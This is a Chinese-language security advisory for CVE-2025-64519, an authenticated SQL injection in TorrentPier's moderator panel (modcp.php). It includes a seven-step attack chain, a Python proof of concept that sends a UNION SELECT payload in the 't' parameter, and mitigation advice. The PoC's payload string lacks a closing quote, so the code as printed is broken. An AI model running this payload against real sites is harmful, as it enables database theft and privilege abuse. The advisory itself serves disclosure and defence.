CVE-2025-64519: TorrentPier modcp.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-64519

漏洞类型

SQL注入

CVSS评分

8.8 高危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

TorrentPier BitTorrent Tracker

漏洞概述

TorrentPier是一款开源的BitTorrent公私Tracker引擎，使用PHP编写。该漏洞存在于版本2.8.8及以下版本的版主控制面板（modcp.php）中，是一个经过身份验证的SQL注入漏洞。攻击者需要拥有版主（moderator）权限才能利用此漏洞。通过在modcp.php页面中注入恶意的topic_id（t）参数，攻击者可以绕过正常的输入验证机制，执行任意SQL查询语句。这可能导致敏感数据泄露、数据库内容篡改或关键数据删除等严重后果。虽然该漏洞需要moderator级别的权限才能利用，但在多用户环境中，如果攻击者获取了版主账户的控制权（通过社会工程学攻击、密码泄露或其他方式），将能够对整个系统造成严重影响。值得注意的是，在公开或半公开的Tracker站点中，版主账户可能相对容易获取，这大大增加了该漏洞的实际威胁程度。官方已在commit 6a0f6499d89fa5d6e2afa8ee53802a1ad11ece80中发布了安全补丁，建议所有使用受影响版本的用户立即升级到最新版本以消除安全风险。

技术细节

该SQL注入漏洞的根本原因在于modcp.php文件对用户输入的topic_id参数（通常以't'作为GET或POST参数名）缺乏充分的输入验证和参数化查询处理。当版主用户访问版主控制面板并提交topic_id参数时，该参数值被直接拼接到SQL查询语句中，而未经过适当的安全过滤或使用预处理语句。攻击者可以通过构造特殊的SQL片段来改变原始查询的逻辑结构，实现联合查询、条件判断绕过或数据提取等操作。例如，攻击者可能利用UNION SELECT语句从数据库的其他表中提取敏感信息，如用户密码哈希、邮箱地址或其他版主账户的凭据。由于该漏洞位于版主控制面板，攻击者还可能利用此漏洞修改其他用户的权限设置、提升自己的权限等级，或删除关键的追踪记录和用户数据。整个攻击过程不需要任何用户交互，攻击者只需构造恶意请求即可完成注入。

攻击链分析

STEP 1

步骤1

攻击者通过社会工程学攻击、密码喷洒或其他方式获取TorrentPier站点的版主账户凭据

STEP 2

步骤2

攻击者使用获取的凭据登录TorrentPier站点，建立有效的会话Cookie

STEP 3

步骤3

攻击者构造包含恶意SQL代码的topic_id参数，例如使用UNION SELECT语句或布尔型盲注技术

STEP 4

步骤4

攻击者向modcp.php发送精心构造的HTTP请求，携带注入的SQL载荷

STEP 5

步骤5

服务器将恶意输入拼接到SQL查询中执行，绕过验证机制

STEP 6

步骤6

攻击者从HTTP响应中提取数据库返回的敏感信息，或通过时间盲注推断数据内容

STEP 7

步骤7

利用获取的信息进一步横向移动，可能包括窃取管理员凭据、修改数据库内容或完全控制整个系统

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-64519 SQL Injection PoC
# Target: TorrentPier modcp.php
# Authentication: Requires moderator privileges
# Payload: Malicious topic_id parameter injection

import requests
import sys

TARGET_URL = "http://target-site.com/modcp.php"

# SQL Injection payload to extract database version
# The 't' parameter is vulnerable to SQL injection
PAYLOAD = "1' UNION SELECT NULL,version(),NULL,NULL,NULL---

def exploit(target_url, session_cookie):
    """Execute SQL injection attack"""
    cookies = {'phpbb2_torrentpier_data': session_cookie}
    
    # Basic exploitation payload
    params = {'t': PAYLOAD}
    
    try:
        response = requests.get(target_url, params=params, cookies=cookies, timeout=10)
        
        if response.status_code == 200:
            print("[+] Request sent successfully")
            print("[*] Check response for database information")
            
            # Extract and display potential sensitive data
            if '5.' in response.text or '8.' in response.text:
                print("[!] Database version detected in response")
                
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 3:
        print(f"Usage: python {sys.argv[0]} <target_url> <session_cookie>")
        sys.exit(1)
    
    exploit(sys.argv[1], sys.argv[2])

# Note: Replace TARGET_URL and obtain valid moderator session cookie
# This PoC demonstrates the vulnerability principle only

影响范围

TorrentPier <= 2.8.8

防御指南

临时缓解措施

如果无法立即升级，可采取以下临时缓解措施：1) 在Web服务器层面配置URL过滤规则，拦截包含SQL注入特征字符（如单引号、UNION、SELECT等）的请求；2) 限制版主控制面板的访问来源IP，添加IP白名单限制；3) 暂时禁用版主功能或降级版主账户权限；4) 在应用层添加请求频率限制，防止自动化SQL注入工具的扫描攻击；5) 启用详细的访问日志和数据库查询日志，实时监控异常请求模式。建议在缓解措施实施后尽快完成版本升级，因为临时措施可能影响正常功能且无法完全消除风险。